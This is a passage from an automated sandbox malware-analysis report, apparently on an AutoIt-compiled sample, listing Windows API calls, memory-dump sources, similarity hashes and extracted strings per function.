                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2704283638-0
                                                                                                                        • Opcode ID: 325da6aeab9a99c5adc6b9d36cb85d433e2be865bd4c2c6b36ca4de7517bd629
                                                                                                                        • Instruction ID: a9be7743042ab2f4537fcd708d398c7a22fe10629b14b776199d78d81060493f
                                                                                                                        • Opcode Fuzzy Hash: 325da6aeab9a99c5adc6b9d36cb85d433e2be865bd4c2c6b36ca4de7517bd629
                                                                                                                        • Instruction Fuzzy Hash: B001AD319827119BCB15AB659A0E79973A0BF10B15F44D00AF81CB7291CF345C42EBD2
                                                                                                                        APIs
                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00EBDE07
                                                                                                                        • ScreenToClient.USER32(?,?), ref: 00EBDE1F
                                                                                                                        • ScreenToClient.USER32(?,?), ref: 00EBDE43
                                                                                                                        • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00EBDE5E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 357397906-0
                                                                                                                        • Opcode ID: c61b804ab533627cc691c4e3baf4dc10f8768b74cf641463c9ed760f0df3f0d1
                                                                                                                        • Instruction ID: 494ba60be46059353be82855ac153f76fd36ed894ef5e7f5c6a8fb3b59513a57
                                                                                                                        • Opcode Fuzzy Hash: c61b804ab533627cc691c4e3baf4dc10f8768b74cf641463c9ed760f0df3f0d1
                                                                                                                        • Instruction Fuzzy Hash: 951120B9D04209EFDB41DF99D8849EEBBF9FB08310F108166E925E3214D735AA55CF90
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 00EBE14D
                                                                                                                        • _memset.LIBCMT ref: 00EBE15C
                                                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00F13EE0,00F13F24), ref: 00EBE18B
                                                                                                                        • CloseHandle.KERNEL32 ref: 00EBE19D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _memset$CloseCreateHandleProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3277943733-0
                                                                                                                        • Opcode ID: 20607fad3e80f0aa855da193107c8ef2a416e41147872c6ddbb1a863fc67316a
                                                                                                                        • Instruction ID: cc4cc908fc3a07d66ba6ca13012f466cb14562c10e3ed98e1361f7ec5e41c487
                                                                                                                        • Opcode Fuzzy Hash: 20607fad3e80f0aa855da193107c8ef2a416e41147872c6ddbb1a863fc67316a
                                                                                                                        • Instruction Fuzzy Hash: 17F082F1A41304BFF2105B76AC06FF77AADDB09394F018421BB08F51A2D3B68E01A7A4
                                                                                                                        APIs
                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 00E99C7F
                                                                                                                          • Part of subcall function 00E9AD14: _memset.LIBCMT ref: 00E9AD49
                                                                                                                        • _memmove.LIBCMT ref: 00E99CA2
                                                                                                                        • _memset.LIBCMT ref: 00E99CAF
                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 00E99CBF
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 48991266-0
                                                                                                                        • Opcode ID: e74ce594d35261d5b4f7c495331c4bd03b187aabee85c4092414b3f6354bf615
                                                                                                                        • Instruction ID: 373536d2232ab4b1d5c28377649dc2eef99cd263c7db593610ba589509a9ebe1
                                                                                                                        • Opcode Fuzzy Hash: e74ce594d35261d5b4f7c495331c4bd03b187aabee85c4092414b3f6354bf615
                                                                                                                        • Instruction Fuzzy Hash: D6F05476201104AFCF016F55EC85A49BB69EF45350F08C062FE086E217C731E815DBF5
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E6B58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00E6B5EB
                                                                                                                          • Part of subcall function 00E6B58B: SelectObject.GDI32(?,00000000), ref: 00E6B5FA
                                                                                                                          • Part of subcall function 00E6B58B: BeginPath.GDI32(?), ref: 00E6B611
                                                                                                                          • Part of subcall function 00E6B58B: SelectObject.GDI32(?,00000000), ref: 00E6B63B
                                                                                                                        • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00EBE860
                                                                                                                        • LineTo.GDI32(00000000,?,?), ref: 00EBE86D
                                                                                                                        • EndPath.GDI32(00000000), ref: 00EBE87D
                                                                                                                        • StrokePath.GDI32(00000000), ref: 00EBE88B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1539411459-0
                                                                                                                        • Opcode ID: 6cb6175fa0bb650f0ee0fefbd3c43adea153731e26c343a71aa368566a41e14e
                                                                                                                        • Instruction ID: 5a0ed2d130ac91b00c2deda483c79662cc4cfddedee0233683b81aacec92c2e4
                                                                                                                        • Opcode Fuzzy Hash: 6cb6175fa0bb650f0ee0fefbd3c43adea153731e26c343a71aa368566a41e14e
                                                                                                                        • Instruction Fuzzy Hash: DAF0BE31006269BADB162F51BC09FCE3F9AAF06320F048102FA01300E1C3754555DF95
                                                                                                                        APIs
                                                                                                                        • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00E8D640
                                                                                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 00E8D653
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00E8D65A
                                                                                                                        • AttachThreadInput.USER32(00000000), ref: 00E8D661
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2710830443-0
                                                                                                                        • Opcode ID: 4e49268a82e0a1aa8abd1188b0ab32ef675e46e1a639d4660d21431e30f5bff6
                                                                                                                        • Instruction ID: 35a1a30055a29e3c3b4cf3b89941c93379a524618f3b1bd02bb4101ea499a904
                                                                                                                        • Opcode Fuzzy Hash: 4e49268a82e0a1aa8abd1188b0ab32ef675e46e1a639d4660d21431e30f5bff6
                                                                                                                        • Instruction Fuzzy Hash: 45E06D7150A228BEDB212FA2EC0DEDB7F1CEF117B1F008012B51CA50A0DA71D584DBE0
                                                                                                                        APIs
                                                                                                                        • GetCurrentThread.KERNEL32 ref: 00E8BE01
                                                                                                                        • OpenThreadToken.ADVAPI32(00000000,?,?,?,00E8B9C9), ref: 00E8BE08
                                                                                                                        • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00E8B9C9), ref: 00E8BE15
                                                                                                                        • OpenProcessToken.ADVAPI32(00000000,?,?,?,00E8B9C9), ref: 00E8BE1C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CurrentOpenProcessThreadToken
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3974789173-0
                                                                                                                        APIs
                                                                                                                        • GetSysColor.USER32(00000008), ref: 00E6B0C5
                                                                                                                        • SetTextColor.GDI32(?,000000FF), ref: 00E6B0CF
                                                                                                                        • SetBkMode.GDI32(?,00000001), ref: 00E6B0E4
                                                                                                                        • GetStockObject.GDI32(00000005), ref: 00E6B0EC
                                                                                                                        • GetWindowDC.USER32(?,00000000), ref: 00ECECFA
                                                                                                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 00ECED07
                                                                                                                        • GetPixel.GDI32(00000000,?,00000000), ref: 00ECED20
                                                                                                                        • GetPixel.GDI32(00000000,00000000,?), ref: 00ECED39
                                                                                                                        • GetPixel.GDI32(00000000,?,?), ref: 00ECED59
                                                                                                                        • ReleaseDC.USER32(?,00000000), ref: 00ECED64
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1946975507-0
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2889604237-0
                                                                                                                        APIs
                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00E8C071
                                                                                                                        • UnloadUserProfile.USERENV(?,?), ref: 00E8C07D
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00E8C086
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00E8C08E
                                                                                                                          • Part of subcall function 00E8B850: GetProcessHeap.KERNEL32(00000000,?,00E8B574), ref: 00E8B857
                                                                                                                          • Part of subcall function 00E8B850: HeapFree.KERNEL32(00000000), ref: 00E8B85E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 146765662-0
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2889604237-0
                                                                                                                        APIs
                                                                                                                        • __getptd_noexit.LIBCMT ref: 00E74C3E
                                                                                                                          • Part of subcall function 00E786B5: GetLastError.KERNEL32(?,00E70127,00E788A3,00E74673,?,?,00E70127,?,00E5125D,00000058,?,?), ref: 00E786B7
                                                                                                                          • Part of subcall function 00E786B5: __calloc_crt.LIBCMT ref: 00E786D8
                                                                                                                          • Part of subcall function 00E786B5: GetCurrentThreadId.KERNEL32 ref: 00E78701
                                                                                                                          • Part of subcall function 00E786B5: SetLastError.KERNEL32(00000000,00E70127,00E788A3,00E74673,?,?,00E70127,?,00E5125D,00000058,?,?), ref: 00E78719
                                                                                                                        • CloseHandle.KERNEL32(?,?,00E74C1D), ref: 00E74C52
                                                                                                                        • __freeptd.LIBCMT ref: 00E74C59
                                                                                                                        • ExitThread.KERNEL32 ref: 00E74C61
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLastThread$CloseCurrentExitHandle__calloc_crt__freeptd__getptd_noexit
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 408300095-0
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _memmove
                                                                                                                        • String ID: >$DEFINE
                                                                                                                        • API String ID: 4104443479-1664449232
                                                                                                                        APIs
                                                                                                                        • OleSetContainedObject.OLE32(?,00000001), ref: 00E8ECA0
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ContainedObject
                                                                                                                        • String ID: AutoIt3GUI$Container
                                                                                                                        • API String ID: 3565006973-3941886329
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E53BCF: _wcscpy.LIBCMT ref: 00E53BF2
                                                                                                                          • Part of subcall function 00E584A6: __swprintf.LIBCMT ref: 00E584E5
                                                                                                                          • Part of subcall function 00E584A6: __itow.LIBCMT ref: 00E58519
                                                                                                                        • __wcsnicmp.LIBCMT ref: 00E9E785
                                                                                                                        • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00E9E84E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                                                                        • String ID: LPT
                                                                                                                        • API String ID: 3222508074-1350329615
                                                                                                                        • Opcode ID: 99eaee13472ac031e76ffd2c1d0828cce41d7c45cc7ab92a83afb2cc96321a32
                                                                                                                        • Instruction ID: 475ef1fab642e0cf712b76f3a828b95608b07949a16fa418d0c53bb1d68e9d21
                                                                                                                        • Opcode Fuzzy Hash: 99eaee13472ac031e76ffd2c1d0828cce41d7c45cc7ab92a83afb2cc96321a32
                                                                                                                        • Instruction Fuzzy Hash: 50616075A00215AFCF18DB94C895EAEB7F9EF08310F04546AFA56BB391DB30AE44CB51
                                                                                                                        APIs
                                                                                                                        • Sleep.KERNEL32(00000000), ref: 00E51B83
                                                                                                                        • GlobalMemoryStatusEx.KERNEL32 ref: 00E51B9C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: GlobalMemorySleepStatus
                                                                                                                        • String ID: @
                                                                                                                        • API String ID: 2783356886-2766056989
                                                                                                                        • Opcode ID: 6811991842fa2ab788c1cad173f9d96d6f6d9e292fd4af8716daa8be53a0a498
                                                                                                                        • Instruction ID: 9045f990a808184a82f92ee1c8a82ada6ac9e12f8d7f6147a13ad4da96217183
                                                                                                                        • Opcode Fuzzy Hash: 6811991842fa2ab788c1cad173f9d96d6f6d9e292fd4af8716daa8be53a0a498
                                                                                                                        • Instruction Fuzzy Hash: B4515B71448B45ABE720AF14E885BABBBECFF98394F41484DF2C8511A1EB71856CC763
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E5417D: __fread_nolock.LIBCMT ref: 00E5419B
                                                                                                                        • _wcscmp.LIBCMT ref: 00E9CF49
                                                                                                                        • _wcscmp.LIBCMT ref: 00E9CF5C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcscmp$__fread_nolock
                                                                                                                        • String ID: FILE
                                                                                                                        • API String ID: 4029003684-3121273764
                                                                                                                        • Opcode ID: ffad01477f5f1920aacb6c293849c0a54c2144a7cc6ecec55afb133389ef8815
                                                                                                                        • Instruction ID: 8544ff3776c30897ef5020f0cef33c0a5282d83b0201df31225d9e6e31613ffc
                                                                                                                        • Opcode Fuzzy Hash: ffad01477f5f1920aacb6c293849c0a54c2144a7cc6ecec55afb133389ef8815
                                                                                                                        • Instruction Fuzzy Hash: EA41E572A00219BADF20EBA4CC41FEF7BFA9F49714F101469F601BB191D7719A888750
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E7889E: __getptd_noexit.LIBCMT ref: 00E7889E
                                                                                                                        • __getbuf.LIBCMT ref: 00E79B8A
                                                                                                                        • __lseeki64.LIBCMT ref: 00E79BFA
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __getbuf__getptd_noexit__lseeki64
                                                                                                                        • String ID: pM
                                                                                                                        • API String ID: 3311320906-582843881
                                                                                                                        • Opcode ID: b222d39a1ff74071be33f3eaaf2fcf98d93521906e8eeaa2dae9cf2a21e26575
                                                                                                                        • Instruction ID: b8c01acf2236565ba618edf82c6a57773e64d43cf27b7b32039a4ebd855a8f7c
                                                                                                                        • Opcode Fuzzy Hash: b222d39a1ff74071be33f3eaaf2fcf98d93521906e8eeaa2dae9cf2a21e26575
                                                                                                                        • Instruction Fuzzy Hash: 28414271500B059ED7359F28D891ABAB7E8EF81334F04D61DE4BEA72D2E774E8408B11
                                                                                                                        APIs
